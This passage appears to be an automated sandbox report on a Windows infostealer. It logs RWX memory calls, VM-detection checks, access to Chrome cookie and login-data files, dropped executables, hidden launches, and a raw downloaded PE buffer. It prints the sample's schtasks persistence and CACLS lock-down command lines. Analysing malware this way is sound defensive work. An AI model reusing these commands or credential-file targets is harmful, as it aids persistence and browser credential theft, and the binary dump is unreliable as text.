NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74011000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2124 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73fe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef4033000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 2162688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001fe0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002170000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2a000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3545000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3591000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3c2b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000590000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000005c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3592000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3594000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3594000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3594000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3594000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93dea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ec6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93dfc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1ed6000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefe52d000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93e0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93dfa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 27, 2023, 10:24 a.m.	process_identifier: 2172 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (14 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceW July 27, 2023, 10:24 a.m.	number_of_free_clusters: 2425381 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:24 a.m.	number_of_free_clusters: 2425381 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:24 a.m.	number_of_free_clusters: 2425247 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:24 a.m.	number_of_free_clusters: 2425247 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:24 a.m.	number_of_free_clusters: 2425178 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:24 a.m.	number_of_free_clusters: 2425178 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2424148 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2424148 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2424045 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2424045 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2423788 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2423788 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2423685 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW July 27, 2023, 10:25 a.m.	number_of_free_clusters: 2423685 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1

Steals private information from local Internet browsers (6 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (22 events)

file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\g2474962.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v7696680.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\k7404811.exe
file	C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\y3938954.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\x2150544.exe
file	C:\Users\test22\AppData\Local\Temp\IXP003.TMP\n6056764.exe
file	C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe
file	C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\j6120486.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompetitive.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c0646653.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\h0472691.exe
file	C:\Users\test22\AppData\Local\Temp\IXP004.TMP\l7621037.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v7318670.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a7207637.exe
file	C:\Users\test22\AppData\Local\Temp\1000011051\an.exe
file	C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b6358658.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompettitive.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d4021112.exe

Creates a suspicious process (6 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "pdates.exe" /P "test22:N"&&CACLS "pdates.exe" /P "test22:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "test22:N"&&CACLS "..\925e7e99c5" /P "test22:R" /E&&Exit
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\regsvr32.exe" -U -S K1heT.2
cmdline	regsvr32.exe -U -S K1heT.2
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F

Drops a binary and executes it (5 events)

file	C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe
file	C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe
file	C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe
file	C:\Users\test22\AppData\Local\Temp\1000011051\an.exe
file	C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe

Drops an executable to the user AppData folder (7 events)

file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\ohcompetitive.exe
file	C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe
file	C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe
file	C:\Users\test22\AppData\Local\Temp\k1het.2
file	C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe
file	C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe

A process created a hidden window (8 events)

Time & API	Arguments	Status	Return
ShellExecuteExW July 27, 2023, 10:24 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe	1	1
ShellExecuteExW July 27, 2023, 10:24 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\test22\AppData\Local\Temp\925e7e99c5\pdates.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW July 27, 2023, 10:24 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "pdates.exe" /P "test22:N"&&CACLS "pdates.exe" /P "test22:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "test22:N"&&CACLS "..\925e7e99c5" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW July 27, 2023, 10:25 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000009051\foto5566.exe	1	1
ShellExecuteExW July 27, 2023, 10:25 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000010051\fotod250.exe	1	1
ShellExecuteExW July 27, 2023, 10:25 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000011051\an.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000011051\an.exe	1	1
ShellExecuteExW July 27, 2023, 10:25 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000012051\raman.exe	1	1
ShellExecuteExW July 27, 2023, 10:25 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 27, 2023, 10:25 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 49152 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x02581000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 27, 2023, 10:25 a.m.	flags: 1158 family: 0	1	0	0

An executable file was downloaded by the process pdates.exe (5 events)

Time & API	Arguments	Status	Return
InternetReadFile July 27, 2023, 10:24 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d®`j@ `ìÞ@Á ¢´À¼PT@ .textcd `.dataHh@À.idataR j@@.rsrcÀ\|@@.relocP @B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä .rsrc$02ÿUì3ÀÒtúÿÿÿv¸WÀxQÿuQèÛëÒtÆ]ÂÿUìSVW3ÿ»W÷Òtúÿÿÿvóöx?òÁÒt8t@îuõþÂ÷Þö+Çæ©ÿøó÷ßÿ#øöxQÿu+×QÏènð_Æ^[]ÂÿUìEV3öÀt=ÿÿÿv¾Wöx5S]3öWxÿEPÿuWSÿ\|¢@ÄÀx;Çwuë¾zÆ_[ë ÀtMÆÆ^]ÃÿUìÒt&ESV¾þÿÿ+ÁötÛt ANêuì^[ÒuI÷ÚÆÒâÿøz]ÂÿUì9MrEº+Á;Âw+M ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile July 27, 2023, 10:25 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $×â%KÔKÔKÔöåNÕKÔöåHÕKÔöåOÕKÔöåJÕKÔJÔ KÔöåCÕKÔöå´ÔKÔöåIÕKÔRichKÔPELâ`bà d°`j@ pq¨@Á ¢´ÀP`T@ .textcd `.dataHh@À.idataR j@@.rsrc À\|@@.reloc` @B@P@¤@p@¢@È@u j@°i@@o@àÀ012P4ð4BIPJÐJ`KÀK LÀLÐLàOcÀc`g°i j`jàlðn@oppr radvapi32.dllCheckTokenMembership" .INF[]RebootAdvancedINFVersionsetupx.dllsetupapi.dll.BATSeShutdownPrivilegeadvpack.dllDelNodeRunDLL32...wininit.ini%luSoftware\Microsoft\Windows\CurrentVersion\App Paths\Kernel32.dllHeapSetInformationTITLEEXTRACTOPTINSTANCECHECKVERCHECKDecryptFileALICENSE<None>REBOOTSHOWWINDOWADMQCMDUSRQCMDRUNPROGRAMPOSTRUNPROGRAMFINISHMSGLoadString() Error. Could not load string resource.CABINETFILESIZESPACKINSTSPACEUPROMPTIXP%03d.TMPIXPi386mipsalphappcA:\msdownld.tmpTMP4351$.TMPRegServerUPDFILE%luControl Panel\Desktop\ResourceLocaleâ`b%ttâ`b Øâ`bprRSDSºÍã÷æÎÍú1 òïåwextract.pdbGCTL¬.rdata$brc¬.CRT$XCA°.CRT$XCAA´.CRT$XCZ¸.CRT$XIA¼.CRT$XIAAÀ.CRT$XIYÄ.CRT$XIZÈx.gfids@0.rdatap.rdata$sxdatat.rdata$zzzdbg8\.text$mn¸r\.xdata$xà.dataàh.bss .idata$5¢.00cfg¢ .idata$2,£.idata$3@£.idata$4È¥ .idata$6À.rsrc$01Ä 